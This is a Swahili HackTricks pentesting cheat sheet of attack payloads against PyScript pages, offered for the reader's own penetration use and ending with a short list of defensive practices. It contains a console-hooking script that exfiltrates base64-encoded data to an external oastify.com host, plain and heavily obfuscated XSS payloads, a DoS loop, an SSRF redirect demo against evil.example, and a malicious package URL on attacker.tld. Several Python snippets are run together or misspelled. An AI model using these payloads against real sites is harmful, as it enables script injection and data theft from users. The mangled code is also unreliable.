HackTricksPyscript
Reading time: 7 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Mwongozo wa PyScript Pentesting
PyScript ni mfumo mpya ulioandaliwa kwa ajili ya kuunganisha Python katika HTML ili, iweze kutumika pamoja na HTML. Katika karatasi hii ya udanganyifu, utaona jinsi ya kutumia PyScript kwa madhumuni yako ya kupenya.
Kutupa / Kurejesha faili kutoka kwenye mfumo wa faili wa kumbukumbu wa Emscripten:
CVE ID: CVE-2022-30286
Code:
<py-script>
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin: out
= fin.read() print(out)
</py-script>
OOB Data Exfiltration ya mfumo wa faili wa kumbukumbu wa Emscripten (uangalizi wa console)
CVE ID: CVE-2022-30286
Code:
<py-script>
x = "CyberGuy" if x == "CyberGuy": with
open('/lib/python3.10/asyncio/tasks.py') as output: contents = output.read()
print(contents) print('
<script>
console.pylog = console.log
console.logs = []
console.log = function () {
console.logs.push(Array.from(arguments))
console.pylog.apply(console, arguments)
fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {
method: "POST",
headers: { "Content-Type": "text/plain;charset=utf-8" },
body: JSON.stringify({ content: btoa(console.logs) }),
})
}
</script>
')
</py-script>
Cross Site Scripting (Kawaida)
Code:
<py-script>
print("<img src=x onerror='alert(document.domain)'>")
</py-script>
Cross Site Scripting (Python Obfuscated)
Code:
<py-script>
sur = "\u0027al";fur = "e";rt = "rt"
p = "\x22x$$\x22\x29\u0027\x3E"
s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
e = "c\u003d";q = "x"
y = "o";m = "ner";z = "ror\u003d"
print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
</py-script>
Cross Site Scripting (JavaScript Obfuscation)
Code:
<py-script>
prinht(""
<script>
var _0x3675bf = _0x5cf5
function _0x5cf5(_0xced4e9, _0x1ae724) {
var _0x599cad = _0x599c()
return (
(_0x5cf5 = function (_0x5cf5d2, _0x6f919d) {
_0x5cf5d2 = _0x5cf5d2 - 0x94
var _0x14caa7 = _0x599cad[_0x5cf5d2]
return _0x14caa7
}),
_0x5cf5(_0xced4e9, _0x1ae724)
)
}
;(function (_0x5ad362, _0x98a567) {
var _0x459bc5 = _0x5cf5,
_0x454121 = _0x5ad362()
while (!![]) {
try {
var _0x168170 =
(-parseInt(_0x459bc5(0x9e)) / 0x1) *
(parseInt(_0x459bc5(0x95)) / 0x2) +
(parseInt(_0x459bc5(0x97)) / 0x3) *
(-parseInt(_0x459bc5(0x9c)) / 0x4) +
-parseInt(_0x459bc5(0x99)) / 0x5 +
(-parseInt(_0x459bc5(0x9f)) / 0x6) *
(parseInt(_0x459bc5(0x9d)) / 0x7) +
(-parseInt(_0x459bc5(0x9b)) / 0x8) *
(-parseInt(_0x459bc5(0x9a)) / 0x9) +
-parseInt(_0x459bc5(0x94)) / 0xa +
(parseInt(_0x459bc5(0x98)) / 0xb) *
(parseInt(_0x459bc5(0x96)) / 0xc)
if (_0x168170 === _0x98a567) break
else _0x454121["push"](_0x454121["shift"]())
} catch (_0x5baa73) {
_0x454121["push"](_0x454121["shift"]())
}
}
})(_0x599c, 0x28895),
prompt(document[_0x3675bf(0xa0)])
function _0x599c() {
var _0x34a15f = [
"15170376Sgmhnu",
"589203pPKatg",
"11BaafMZ",
"445905MAsUXq",
"432bhVZQo",
"14792bfmdlY",
"4FKyEje",
"92890jvCozd",
"36031bizdfX",
"114QrRNWp",
"domain",
"3249220MUVofX",
"18cpppdr",
]
_0x599c = function () {
return _0x34a15f
}
return _0x599c()
}
</script>
"")
</py-script>
Shambulio la DoS (Mzunguko wa Usoni)
Code:
<py-script>
while True:
print(" ")
</py-script>
Uthibitisho mpya & mbinu (2023-2025)
Server-Side Request Forgery kupitia upitisho usio na udhibiti (CVE-2025-50182)
urllib3 < 2.5.0 inapuuzilia mbali vigezo vya redirect na retries wakati inatekelezwa ndani ya mazingira ya Pyodide yanayokuja na PyScript. Wakati mshambuliaji anaweza kuathiri URL za lengo, wanaweza kulazimisha msimbo wa Python kufuata upitisho wa kuvuka maeneo hata wakati mbunifu amezuia waziwazi ‑ kwa ufanisi kuzunguka mantiki ya kupambana na SSRF.
<script type="py">
import urllib3
http = urllib3.PoolManager(retries=False, redirect=False) # supposed to block redirects
r = http.request("GET", "https://evil.example/302") # will STILL follow the 302
print(r.status, r.url)
</script>
Imepatikana katika urllib3 2.5.0 – sasisha kifurushi katika picha yako ya PyScript au weka toleo salama katika packages = ["urllib3>=2.5.0"]. Tazama kuingia rasmi kwa CVE kwa maelezo zaidi.
Upakiaji wa kifurushi bila mpangilio & mashambulizi ya mnyororo wa usambazaji
Kwa kuwa PyScript inaruhusu URL zisizo na mpangilio katika orodha ya packages, mhusika mbaya ambaye anaweza kubadilisha au kuingiza usanidi anaweza kutekeleza Python isiyo na mpangilio kabisa katika kivinjari cha mwathirika:
<py-config>
packages = ["https://attacker.tld/payload-0.0.1-py3-none-any.whl"]
</py-config>
<script type="py">
import payload # executes attacker-controlled code during installation
</script>
Ni magurudumu ya pure-Python pekee yanahitajika – hakuna hatua ya uundaji wa WebAssembly inayohitajika. Hakikisha usanidi hauwezi kudhibitiwa na mtumiaji na mwenyeji wa magurudumu ya kuaminika kwenye eneo lako mwenyewe kwa HTTPS & SRI hashes.
Mabadiliko ya usafi wa matokeo (2023+)
print()bado inaingiza HTML safi na kwa hivyo ni hatari ya XSS (mfano hapo juu).- Msaada mpya wa
display()huondoa HTML kwa chaguo-msingi – alama safi lazima iwekwe ndani yapyscript.HTML().
from pyscript import display, HTML
display("<b>escaped</b>") # renders literally
display(HTML("<b>not-escaped</b>")) # executes as HTML -> potential XSS if untrusted
Hali hii ilianzishwa mwaka 2023 na imeandikwa katika mwongozo rasmi wa Built-ins. Tegemea display() kwa pembejeo zisizoaminika na epuka kuita print() moja kwa moja.
Mbinu Bora za Kijihifadhi
- Sasisha pakiti – panda hadi
urllib3 >= 2.5.0na mara kwa mara jenga tena magurudumu yanayokuja na tovuti. - Punguza vyanzo vya pakiti – rejelea majina ya PyPI au URLs za asili moja, bora zaidi zilizo na ulinzi wa Sub-resource Integrity (SRI).
- Imarisha Sera ya Usalama wa Maudhui – kataza JavaScript ya ndani (
script-src 'self' 'sha256-…') ili vizuizi vya<script>vilivyoingizwa visiweze kutekelezwa. - Kataza lebo za mtumiaji
<py-script>/<script type="py">– safisha HTML kwenye seva kabla ya kuirudisha kwa watumiaji wengine. - Tenga wafanyakazi – ikiwa huhitaji ufikiaji wa synchronous kwa DOM kutoka kwa wafanyakazi, wezesha bendera ya
sync_main_onlyili kuepuka mahitaji ya kichwa chaSharedArrayBuffer.
Marejeleo
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.